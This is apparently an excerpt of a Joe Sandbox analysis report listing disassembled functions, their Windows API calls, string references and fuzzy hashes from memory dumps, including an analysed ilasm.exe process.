Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 620266ecf1968739947b4787c48b9c8c61ceb8ce37697b2421a9bb956c108c29
Instruction ID: 35a66047426bc9689c089b2830bfb293693a5ae1bb0f1b98f719a3720d075ff5
Opcode Fuzzy Hash: 620266ecf1968739947b4787c48b9c8c61ceb8ce37697b2421a9bb956c108c29
Instruction Fuzzy Hash: 8C61C132A0AA4681EF99BB50D8503BAE366EF94B54FC51437D61E23790DF7CE481C368

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703017640 Relevance: 7.6, APIs: 5, Instructions: 136threadCOMMON

Download Yara Rule

APIs

FlushProcessWriteBuffers.KERNEL32 ref: 00007FF7030176D4
SwitchToThread.KERNEL32 ref: 00007FF70301779D
QueryPerformanceCounter.KERNEL32 ref: 00007FF7030177AC
QueryPerformanceFrequency.KERNEL32 ref: 00007FF7030177BB
QueryPerformanceCounter.KERNEL32 ref: 00007FF703017803

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: PerformanceQuery$Counter$BuffersFlushFrequencyProcessSwitchThreadWrite
String ID:
API String ID: 3450244608-0
Opcode ID: 7fc573f76d121247ce502c3a4d4490793d5b076310b70205a7a8df07ab53fc20
Instruction ID: 9139d8445ab15ea4f8feeb0567d3cc747046166c1772faeadc594857f4e83def
Opcode Fuzzy Hash: 7fc573f76d121247ce502c3a4d4490793d5b076310b70205a7a8df07ab53fc20
Instruction Fuzzy Hash: 8151A422E1A64286EA90BF15EC415BAE792FF84B50FD50031EE8D67796EF3CD401C764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703016A40 Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70301C7E0: GetCurrentThreadId.KERNEL32 ref: 00007FF70301C7E4

GetCurrentThreadId.KERNEL32 ref: 00007FF703016A6D
GetCurrentProcess.KERNEL32 ref: 00007FF703016A7B
GetCurrentThread.KERNEL32 ref: 00007FF703016A83
DuplicateHandle.KERNEL32 ref: 00007FF703016AA7

Part of subcall function 00007FF70301C3A0: VirtualQuery.KERNEL32 ref: 00007FF70301C3D2

RaiseFailFastException.KERNEL32 ref: 00007FF703016AD0

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
String ID:
API String ID: 510365852-0
Opcode ID: 4156535ec81082677805c0bade3d63f540fe666b84ee07afd55d535aa79cd72a
Instruction ID: f187f603e03e3077e8137d7238b447f35c0ed078104540c80d31acf352130b77
Opcode Fuzzy Hash: 4156535ec81082677805c0bade3d63f540fe666b84ee07afd55d535aa79cd72a
Instruction Fuzzy Hash: 51118472B0A78192EB88EB51BD413AEF361FF44390F804135E65D57786EF78E4618714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7030146B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32 ref: 00007FF703014750
RaiseFailFastException.KERNEL32 ref: 00007FF703014859
RaiseFailFastException.KERNEL32 ref: 00007FF703014896

Strings

Process is terminating due to StackOverflowException., xrefs: 00007FF70301473A

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: Process is terminating due to StackOverflowException.
API String ID: 2546344036-2200901744
Opcode ID: ce5bdbe97bba3df916a5f1724cc89e6736e5722d3faab0805571fded84199c96
Instruction ID: b87e73720ca5faa99d6cf784bb35d183ff203b1c13c10f65352ae87928bcb691
Opcode Fuzzy Hash: ce5bdbe97bba3df916a5f1724cc89e6736e5722d3faab0805571fded84199c96
Instruction Fuzzy Hash: 3151BB22F0A68281EFD0BB16DC50379E3A2EF49B54FC44035DA1D677A0EF2CE4518314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703054B20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,00000000,00007FF703054C1D,?,?,00081000,00007FF7030424BC), ref: 00007FF703054B72
GetProcAddress.KERNEL32(?,?,?,?,00000000,00007FF703054C1D,?,?,00081000,00007FF7030424BC), ref: 00007FF703054B8C

Strings

kernel32.dll, xrefs: 00007FF703054B5D
GetEnabledXStateFeatures, xrefs: 00007FF703054B82

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetEnabledXStateFeatures$kernel32.dll
API String ID: 2574300362-4754247
Opcode ID: d74b2144f7f02cea84147d775869d4d1b4597de5f5b69796e83367d139ab5923
Instruction ID: b8ba28c652b3659029fd133b1ed5a1e62a47dba0cf37750499489f236d65f7e2
Opcode Fuzzy Hash: d74b2144f7f02cea84147d775869d4d1b4597de5f5b69796e83367d139ab5923
Instruction Fuzzy Hash: C5213661F2E91242FFF89726F8553BAA2829F44394FC4843BC90E92AC4DE1DE8C14614

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70301CA30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,00007FF7030154C5), ref: 00007FF70301CA43
GetProcAddress.KERNEL32(?,?,?,?,00007FF7030154C5), ref: 00007FF70301CA58

Strings

GetEnabledXStateFeatures, xrefs: 00007FF70301CA4E
kernel32, xrefs: 00007FF70301CA36

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetEnabledXStateFeatures$kernel32
API String ID: 2574300362-4273408117
Opcode ID: c6a52a5e33f4fbc7973959c1bdcbe2cddb4d2594fa02781a6e58775c5a6a3621
Instruction ID: 43f300bc8337d21d905b67c522aac256369aa94280eca8e1cf929b810d4a48a5
Opcode Fuzzy Hash: c6a52a5e33f4fbc7973959c1bdcbe2cddb4d2594fa02781a6e58775c5a6a3621
Instruction Fuzzy Hash: EDE04F54F1AA0392FE85F711AC4526453516F9DB00FC88434C81D22390AF2CA64A8730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703050B20 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,?,00007FF70302CB26), ref: 00007FF703050B9B
SwitchToThread.KERNEL32(?,?,?,00007FF70302CB26), ref: 00007FF703050C42
SwitchToThread.KERNEL32(?,?,?,00007FF70302CB26), ref: 00007FF703050C58

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: b69285e8d4cba9003ddf0f9a8d3f5a3178b8bfe19829defa3af9f0d7eff33ef6
Instruction ID: ca1561309e47e88f88795a6452586b24f144ad85a119ae3e4c60be9611a262c2
Opcode Fuzzy Hash: b69285e8d4cba9003ddf0f9a8d3f5a3178b8bfe19829defa3af9f0d7eff33ef6
Instruction Fuzzy Hash: ED419132B1A64685FBE09F25D89063EB652EF41F9CF94813AC64E567C5DF3CE4408728

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70301C630 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF703016BD1), ref: 00007FF70301C664
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF703016BD1), ref: 00007FF70301C66E
CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF703016BD1), ref: 00007FF70301C68D
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF703016BD1), ref: 00007FF70301C6A1

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: ErrorLastMultipleWait$HandlesObjects
String ID:
API String ID: 2817213684-0
Opcode ID: e67efaafb375579e134aedbf741a0c552a1e6a4ca6ae6ed1803f3103c2dd705d
Instruction ID: 7617f454bf2e328b5974d653cd21a4cfd62fb6b22bdae10203630b44be12dc8a
Opcode Fuzzy Hash: e67efaafb375579e134aedbf741a0c552a1e6a4ca6ae6ed1803f3103c2dd705d
Instruction Fuzzy Hash: BB11E931B1CA55C2E754AB19B80412AF2A1FF48B90F940135EACD93B95DF3CD8408714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70307B1B0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF70307B1DC
GetCurrentThreadId.KERNEL32 ref: 00007FF70307B1EA
GetCurrentProcessId.KERNEL32 ref: 00007FF70307B1F6
QueryPerformanceCounter.KERNEL32 ref: 00007FF70307B206

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: ac7ab9dd74e7e7389db1b95bbae797b65a77c40960a93acce7b48fb33917dab3
Instruction ID: de127108a98a6a2f08f8cd58974eca1e2ff9ff114567836620dc5532fcd47d69
Opcode Fuzzy Hash: ac7ab9dd74e7e7389db1b95bbae797b65a77c40960a93acce7b48fb33917dab3
Instruction Fuzzy Hash: E1114C36B14F018AEB40DB60EC442B8B3A4FB19768F840E35DA2D577A4EF3CD1588350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70307C53C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(00007FF70307B843,?,?,?,?,00007FF70307AC7B), ref: 00007FF70307C58C
RaiseException.KERNEL32(00007FF70307B843,?,?,?,?,00007FF70307AC7B), ref: 00007FF70307C5CD

Strings

csm, xrefs: 00007FF70307C5BA

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 728371364096f648f31745791c89a4104a50dd87d54279bb94e5c575f60b5918
Instruction ID: 60c78d8e9c6afbf37012bc6de88a2cb62798751b3214472f641911213f4a090b
Opcode Fuzzy Hash: 728371364096f648f31745791c89a4104a50dd87d54279bb94e5c575f60b5918
Instruction Fuzzy Hash: E5115E32A19B8182EB61DB15F840269B7E1FF88B94F984234DA8D17754DF3DC5918704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703044020 Relevance: 5.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF70303F8F2,?,00000000,?,?,00000000,00007FF70304F0D9), ref: 00007FF70304409E
LeaveCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF70303F8F2,?,00000000,?,?,00000000,00007FF70304F0D9), ref: 00007FF7030440EE
EnterCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF70303F8F2,?,00000000,?,?,00000000,00007FF70304F0D9), ref: 00007FF703044123
LeaveCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF70303F8F2,?,00000000,?,?,00000000,00007FF70304F0D9), ref: 00007FF70304413E

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 0fb3df51c682bcde55da87e9572e4b62eb2ada56f60dc6d1263201ea0e4265ec
Instruction ID: 8c377cdec333c7e2c05abc1fe0ab7af2aac4b95ad851640ea7860b98fa38d586
Opcode Fuzzy Hash: 0fb3df51c682bcde55da87e9572e4b62eb2ada56f60dc6d1263201ea0e4265ec
Instruction Fuzzy Hash: 00417471A09A4291F790EF22FC80978E3A5FF45B84F944139DA4D63AA4CF7CE562C314

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ilasm.exePID: 7372, Parent PID: 7424COMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	96
Total number of Limit Nodes:	6

Executed Functions

Function 0DD7A200 Relevance: 3.5, Strings: 2, Instructions: 1015COMMON

Download Yara Rule

Strings

(aq, xrefs: 0DD7AE2B
(aq, xrefs: 0DD7A7E0

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: (aq$(aq
API String ID: 0-3916115647
Opcode ID: 756801fc25e3ebd59412ea65dbc2663ff0d8e02d1a47738e04cdb28021fe9a6f
Instruction ID: dbae463f867f5dffa96a63e3aa89e39ec92d74b44630c56e5d863d42f74cff7c
Opcode Fuzzy Hash: 756801fc25e3ebd59412ea65dbc2663ff0d8e02d1a47738e04cdb28021fe9a6f
Instruction Fuzzy Hash: D9826C75B006558FCB19CF69C494A6EBBF2BF88300F1485ADE55ACB791EB30E845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0DD78640 Relevance: 9.2, Strings: 7, Instructions: 408
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 0DD7891E
Haq, xrefs: 0DD78B3D
(aq, xrefs: 0DD78ABA
Haq, xrefs: 0DD78B12
(aq, xrefs: 0DD78988
(aq, xrefs: 0DD78AE6
(aq, xrefs: 0DD78E18

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: (aq$(aq$(aq$(aq$(aq$Haq$Haq
API String ID: 0-2223377583
Opcode ID: 1df4c22247046117cdb5b34ac31ae79d7e5389b2d11bb6af78f122830ca4d2cd
Instruction ID: bebb9c7712b6e1a5d0c2e0f55a343e8f8721849ac07bf68debdedef0e9aef828
Opcode Fuzzy Hash: 1df4c22247046117cdb5b34ac31ae79d7e5389b2d11bb6af78f122830ca4d2cd
Instruction Fuzzy Hash: 79E1D2317146418FCB15CF68D498A6EBBE2FF85211B548A9DE48ACB786EB30FC01DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0DD77E80 Relevance: 4.3, Strings: 3, Instructions: 505
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 0DD78420
(aq, xrefs: 0DD77F85
(aq, xrefs: 0DD78248

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: (aq$(aq$(aq
API String ID: 0-2593664646
Opcode ID: fba449a23e3434c277eb74a1e54c09bc88f5bc7b2ccbb5aaf5cbe8d8a7a0f397
Instruction ID: 58802297cdd4601130ab6e52ab15bc8b9b8f2639a4477ada9018a570ed1c33b1
Opcode Fuzzy Hash: fba449a23e3434c277eb74a1e54c09bc88f5bc7b2ccbb5aaf5cbe8d8a7a0f397
Instruction Fuzzy Hash: 8D029C31B006159FCB64DF68C594A6EBBF2FF88300B1489A9D54ADB785DA34ED02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0DD713D8 Relevance: 4.1, Strings: 3, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 0DD71501
Haq, xrefs: 0DD71559
(aq, xrefs: 0DD7152D

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: (aq$(aq$Haq
API String ID: 0-2456560092
Opcode ID: 0d7f1fc1ba575015ecb5190133979f3829345fb95cbd7d89a5096e8b6529201e
